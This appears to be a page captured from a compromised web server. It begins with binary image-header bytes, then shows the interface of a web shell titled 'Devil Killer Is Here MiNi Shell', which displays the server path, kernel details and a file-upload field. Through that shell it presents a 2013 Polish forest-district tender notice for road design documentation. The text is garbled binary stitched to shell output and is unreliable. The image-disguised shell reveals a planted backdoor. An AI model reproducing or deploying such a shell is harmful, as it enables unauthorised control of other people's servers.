JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130823/168307-N-2013.html

<p class="kh_header"><b>Ostrowiec Świętokrzyski: WYKONANIE DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ BUDOWY DROGI LEŚNEJ NR 8 W LEŚNICTWIE STRÓŻA</b><br>
<b>Numer ogłoszenia: 168307 - 2013; data zamieszczenia: 23.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Ostrowiec Świętokrzyski , Sudół 216, 27-400 Ostrowiec Świętokrzyski, woj. świętokrzyskie, tel. 041 2653149, faks 041 2651429.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radom.lasy.gov.pl/ostrowiec</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ BUDOWY DROGI LEŚNEJ NR 8 W LEŚNICTWIE STRÓŻA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa wykonania w pełnym i kompleksowym zakresie dokumentacji projektowo-kosztorysowej budowy drogi leśnej nr 8 będącej dojazdem pożarowym nr 28 w Leśnictwie Stróża, obręb leśny Ćmielów, na działkach nr ewid. 48/456, 49/457, 50/458, 51/459, 52/460, 53/461, 54/462, 55/463, 56/464 obr. ew. Wojciechówka, gmina Ożarów wraz ze zjazdem z drogi wojewódzkiej nr 755  oraz z niezbędną infrastrukturą techniczną i składnicą drewna jak również z uzyskaniem pozwolenia na budowę dla inwestycji budowy opisanej powyżej drogi leśnej. Całkowita długość drogi projektowanej wynosi ok. 1,6 km. W zakres wykonania dokumentacji projektowej wchodzą w szczególności następujące czynności: uzyskanie w imieniu Zamawiającego decyzji o warunkach zabudowy, przygotowanie niezbędnych dokumentacji i wykonanie niezbędnych ocen, raportów i postanowień łącznie z analizą inwestycji pod kątem przedsięwzięć mogących znacząco oddziaływać na środowisko, przeprowadzenie niezbędnych uzgodnień dokumentacji projektowej z zarządcą drogi wojewódzkiej nr 755 oraz innymi instytucjami, w zakresie zjazdów i skrzyżowań, wykonanie przez osobę uprawnioną badań geologicznych /geotechnicznych/ dla rozpoznania warunków gruntowo-wodnych podłoża inwestycji na całej trasie budowanej drogi w minimalnym rozstawie otworów badawczych /wierceń/ wzdłuż osi drogi co 150 m, z zastrzeżeniem, że w przypadku skomplikowanych warunków podłoża zachować rozstaw otworów min. co 100 m oraz uwzględnić wiercenia w pasie drogowym w miejscach występowania torfu. Głębokość wierceń min. 2 m poniżej terenu oraz w torfie do głębokości zalegania na całej trasie budowanej drogi. Wyniki badań winny być przedstawione jako odrębne opracowanie stanowiące część dokumentacji będącej przedmiotem zamówienia, wykonanie waloryzacji przyrodniczej przez specjalistę z zakresu ochrony przyrody w celu oceny wpływu inwestycji budowy drogi na różnorodność biologiczną. Pod pojęciem waloryzacji przyrodniczej sporządzonej przez specjalistę z zakresu ochrony przyrody oceny wpływu inwestycji budowy drogi na różnorodność biologiczną należy rozumieć odrębną /nie związaną z uzyskiwaniem niezbędnych opinii i zezwoleń zmierzających do uzyskania pozwolenia na budowę/ ocenę /opinię/ w sprawie wpływu projektowanej inwestycji budowy drogi na środowisko przyrodnicze i różnorodność biologiczną przyległego kompleksu leśnego /polecenie techniczne certyfikacji FSC/. W wyżej wymienionej ocenie /opinii/ winna zostać zawarta: -ogólna charakterystyka różnorodności biologicznej terenów przyległych do projektowanej drogi /zbiorowiska leśne, flora i inne grupy organizmów z wyszczególnieniem stwierdzonych organizmów/, - ustalenie wpływu inwestycji na środowisko przyrodnicze różnorodność biologiczną, uzyskanie zezwoleń i decyzji związanych z treścią sporządzonej waloryzacji przyrodniczej, uzyskanie decyzji pozwolenia na budowę dla inwestycji będącej przedmiotem zamówienia budowy drogi leśnej128 na terenie w Leśnictwach Piaski i Jeziórko obręb Ćmielów gmina Ćmielów Obr. ew. Ruda Kościelna, zaprojektowanie oznakowania pionowego i poziomego projektowanej drogi uwzględniające jej oznakowanie na drogach publicznych i innych drogach nie będących w zarządzie Nadleśnictwa Ostrowiec Świętokrzyski i uzgodnienie projektu oznakowania zgodnie z obowiązującymi przepisami, zaprojektowanie stałych składnic drewna: dużych w liczbie 4 szt. przylegających do pasa budowanej drogi z uwzględnieniem spadków terenu i lokalizacją składnic poza obszarami zlewni wód opadowych. Dokumentacja projektowo-kosztorysowa winna uwzględniać: -treść notatki służbowej z dnia 21.05.2013 r. w sprawie ustalenia założeń przedprojektowych dotyczących budowy drogi leśnej nr 8 będącej dojazdem pożarowym nr 28 na terenie leśnictwa Stróża obr, Ćmielów /załącznik nr 9 do siwz/ z zastrzeżeniem, że przy projektowaniu składnic należy przyjąć wymiary zgodnie z załącznikiem nr 3 do notatki służbowej, oraz, że liczba projektowanych stałych składnic drewna wynosi: 2 duże składnice drewna. -zaprojektować składnice drewna o lokalizacji zgodnie z załącznikiem nr 9 do siwz -zaprojektować mijanki wg obowiązujących przepisów uwzględniając szerokość mijanki bez pobocza - 3 m -zaprojektować 1 zatokę postojową przy drodze publicznej nr 755 zgodnie z opisem wskazanym w notatce służbowej z dnia 21.05.2013 r. -zaprojektować montaż rogatek przy zjazdach na drogę publiczną przy założeniu zapewnienia rogatek przez Zamawiającego z ustawieniem rogatek za zatokami postojowymi oraz zaprojektować obejście rogatek dla pieszych i rowerzystów po jednej stronie rogatki. -oporowanie poboczy na szerokości min. 0,25 m, - zaprojektować oznakowanie pionowe i poziome projektowanej drogi uwzględniając jej oznakowanie na drogach publicznych i innych drogach nie będących w zarządzie Nadleśnictwa Ostrowiec Św. i uzgodnić projekt oznakowania zgodnie z obowiązującymi przepisami. -przebieg urządzeń podziemnych jak kable energetyczne, instalacje sieci i inne, których obecność lub brak Wykonawca dokumentacji projektowo-kosztorysowej stwierdzi samodzielnie korzystając z zasobów powszechnej ewidencji gruntów jak również na podstawie stosowanych znaków i jakichkolwiek innych oznak mogących wskazywać na ich istnienie. Wykonawca dokumentacji projektowej zobowiązany jest niezwłocznie po podpisaniu umowy na wykonanie dokumentacji, z zastrzeżeniem terminu wskazanego poniżej, zapoznać się z materiałami /notatkami, decyzjami itp./ załączonymi do siwz celem sprawdzenia, czy zawierają one wszystkie niezbędne dane i informacje do wykonania dokumentacji projektowo-kosztorysowej i uzyskania pozwolenia na budowę. W przypadku stwierdzenia braków, których uzupełnienie obciąża Zamawiającego, Wykonawca niezwłocznie tj. w terminie do 3 dni od daty podpisania umowy zgłosi je do Nadleśnictwa Ostrowiec Św. Stwierdzenie braków po tym terminie nie jest podstawą do wydłużenia terminu i obciąża Wykonawcę. Dokumentacja projektowo-kosztorysowa winna być sporządzona zgodnie zasadami współczesnej wiedzy technicznej, obowiązującymi przepisami i normami a w szczególności: -Poradnikiem technicznym drogi leśne Warszawa-Bedoń 2006 -Rozporządzeniem Ministra Środowiska z dnia 22 marca 2006 r., w sprawie szczegółowych zasad zabezpieczenia przeciwpożarowego lasów, -Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r., w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym, -Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r., w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, -Ustawą z dnia 7 lipca 1994 Prawo budowlane wraz z przepisami wykonawczymi dot. warunków technicznych jakim powinny odpowiadać obiekty budowlane. -Ustawą z dnia 3.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko. Dokumentacja projektowo-kosztorysowa winna zawierać: -projekt budowlany z pozwoleniami, uzgodnieniami i opiniami wymaganymi odrębnymi przepisami, -projekt wykonawczy, -opracowanie informacji o bezpieczeństwie i ochronie zdrowia zgodnie z wymogami rozporządzenia Ministra Infrastruktury z dnia 23.06.2003 r. /Dz. U. nr 120 poz. 112./, -przedmiary robót oraz kosztorysy ślepe /sporządzone w podziale m.in. na zakresy: składnice, zjazd z drogi publicznej i skrzyżowania z drogą nie będącą w zarządzie Nadleśnictwa Ostrowiec Św. w zasięgu działek ewidencyjnych nie będących w zarządzie Nadleśnictwa Ostrowiec Św., zatoki postojowe/, -kosztorysy inwestorskie w podziale jak wyżej, -dokumentację dotyczącą wykonanych badań geologicznych dla rozpoznania warunków glebowo-wodnych na trasie inwestycji, -opracowanie w zakresie waloryzacji przyrodniczej przez specjalistę z zakresu ochrony przyrody oceny wpływu inwestycji budowy drogi na różnorodność biologiczną z /polecenie techniczne certyfikacji FSC/, -specyfikacje techniczne wykonania i odbioru robót, -rozliczenie powierzchniowe inwestycji w zakresie poszczególnych działek ewidencyjnych, na których zlokalizowana jest inwestycja oraz rozliczenie powierzchniowe inwestycji na poszczególne wydzielenia leśne, -projekt oznakowania pionowego i poziomego projektowanej drogi uwzględniający jej oznakowanie na drogach publicznych i innych drogach nie będących w zarządzie Nadleśnictwa Ostrowiec Św., uzgodniony zgodnie z obowiązującymi przepisami. Wykonawca sporządza kosztorys inwestorski dla całości zadania inwestycyjnego oraz kosztorysy z wyodrębnieniem kosztów wykonania zjazdu z drogi publicznej i skrzyżowań z drogami nie będącymi w zarządzie Nadleśnictwa Ostrowiec Św. w zasięgu działek ewidencyjnych nie będących w zarządzie Nadleśnictwa Ostrowiec Św., kosztów składnic, zatok postojowych. Wykonawca dostarczy Zamawiającemu dokumentację projektowo-kosztorysową w następującej ilości egzemplarzy w formie papierowej: - projekt budowlany z pozwoleniami, uzgodnieniami i opiniami wymaganymi odrębnymi przepisami - 6 egz. -projekt wykonawczy - 6 egz. - przedmiary robót - 6 egz. -aktualne kosztorysy inwestorskie oraz kosztorysy ślepe - po 2 egz. każdy, - dokumentację dotyczącą wykonanych badań geologicznych dla rozpoznania warunków glebowo-wodnych na trasie inwestycji - 4 egz. - opracowanie w zakresie waloryzacji przyrodniczej przez specjalistę z zakresu ochrony przyrody oceny wpływu inwestycji budowy drogi na różnorodność biologiczną /polecenie techniczne certyfikacji FSC/ wraz z zezwoleniami i decyzjami związanymi z treścią sporządzonej waloryzacji przyrodniczej - 2 egz. - szczegółowe specyfikacje techniczne wykonania i odbioru robót - 4 egz. - rozliczenie powierzchniowe inwestycji w zakresie poszczególnych działek ewidencyjnych, na których zlokalizowana jest inwestycja oraz rozliczenie powierzchniowe inwestycji na poszczególne wydzielenia leśne - 6 egz. -projekt oznakowania pionowego i poziomego projektowanej drogi uwzględniający jej oznakowanie na drogach publicznych i innych drogach nie będących w zarządzie Nadleśnictwa Ostrowiec Św. uzgodniony zgodnie z obowiązującymi przepisami - 4 egz. -wszystkie aktualne elementy dokumentacji w 1 egz. w formie elektronicznej. Dodatkowe egzemplarze opracowania w ilościach żądanych przez Zamawiającego, Wykonawca sporządzi za dodatkową opłatą..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje na podstawie art. 67 ust. 1 pkt. 6 ustawy, możliwość udzielenia w okresie 3 lat od udzielenia niniejszego zamówienia, zamówień uzupełniających polegających na powtórzeniu prac będących przedmiotem zamówienia lub jego części o wartości nie przekraczającej 30% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca
- udokumentuje wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należyte wykonanie dokumentacji projektowych o podobnym charakterze i zakresie jakie obejmuje zamówienie, obejmujących minimum dwie dokumentacje na budowę nowej drogi lub przebudowę istniejących dróg wymagających pozwolenia na budowę, o wartości co najmniej 10 000,00 zł brutto każda (słownie: dziesięć tysięcy złotych 00/100), Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie zawarte w formularzu oferty potwierdzone dowodami, że roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami i obowiązującymi przepisami i prawidłowo ukończone.
Wykonanie usług potwierdzających posiadanie wiedzy i doświadczenia musi być potwierdzone dowodami, czy są wykonane lub wykonywane należycie (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie).
W/w elementy składowe tego warunku zostaną uznane za spełnione, jeżeli były zrealizowane w jednym kontrakcie, jak również w osobnych kontraktach.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował ich zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
W przypadku, gdy dokumenty złożone przez Wykonawcę, w celu potwierdzenia spełniania warunków udziału w postępowaniu, zawierają dane określone w innych walutach niż określone w SIWZ, Zamawiający dokona ich przeliczenia wg średniego kursu NBP obowiązującego	(publikowanego)	na	dzień	zakończenia realizacji	zamówienia potwierdzającego posiadanie stosownego   doświadczenia (w przypadku braku określenia dokładnej daty zakończenia na pierwszy dzień określonego miesiąca). Tabela kursów walut na stronie internetowej http://www.nbp.pl/kursy/kursy.html. Ocena spełniania warunku zostanie dokonana na podstawie informacji i danych zawartych w dokumentach o których mowa w pkt. IX. (punkt  1.2. lit. b) SIWZ  tj. w oparciu o wykaz wykonanych usług w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie oraz dokumenty potwierdzające, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie zawarte w formularzu oferty o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca:
wykaże, że dysponuje co najmniej jedną osobą, posiadającą uprawnienia budowlane w specjalności drogowej uprawniające do projektowania, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243 poz. 1623, ze zm.), Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. nr 83 poz. 578, ze zm.) Dopuszczalne są uprawnienia, uzyskane na podstawie przepisów wcześniej obowiązujących uprawniające do projektowania dróg w zakresie obejmującym przedmiot zamówienia.
W przypadku, gdy wskazane przez Wykonawcę osoby są obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą one spełniać wymogi określone w art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. Nr 243 poz. 1623, ze zm.).
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia            z innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował ich zasobami niezbędnymi do realizacji zamówienia, w szczególności, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie zawarte w formularzu oferty oraz wykaz osób wraz         z informacjami na temat ich kwalifikacji zawodowych, doświadczenia, którego wzór stanowi załącznik nr 5 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany terminu realizacji przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, jeżeli wystąpią następujące czynniki uniemożliwiające realizację przedmiotu zamówienia w terminie:
a) w przypadku przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej, wykorzystywane przez oferentów lub inne podmioty,
b) udzielenia zamówień dodatkowych, których wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego,
c) wystąpienia siły wyższej, której wystąpienie ma wpływ na realizację umowy lub
wystąpienie okoliczności zaistniałych w trakcie realizacji przedmiotu umowy utrudniających lub uniemożliwiających terminowe wykonanie przedmiotu umowy. Termin siła wyższa oznacza osunięcia gruntów, długotrwałe intensywne opady, powódź i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze Stron i którym żadna ze Stron nie mogła zapobiec,
d) czasowego wstrzymania realizacji prac przez Zamawiającego lub z przyczyn wynikających z działań Zamawiającego, których nie można było przewidzieć pomimo zachowania należytej staranności,
e) opóźnienia organów administracji publicznej (liczone w stosunku do terminów ustawowych) w zakresie wydawania opinii, uzgodnień czy decyzji niezbędnych do realizacji niniejszego zamówienia,
f) w przypadku zmian w przepisach prawa, norm, standardów i wiedzy technicznej, działań organów administracji publicznej, bądź działań osób trzecich wymagających wprowadzenia zmian w dokumentacji projektowej, specyfikacjach technicznych, które wymuszą przerwanie prac lub zmianę wykonanych/uzyskanych opracowań, uzgodnień i pozwoleń.
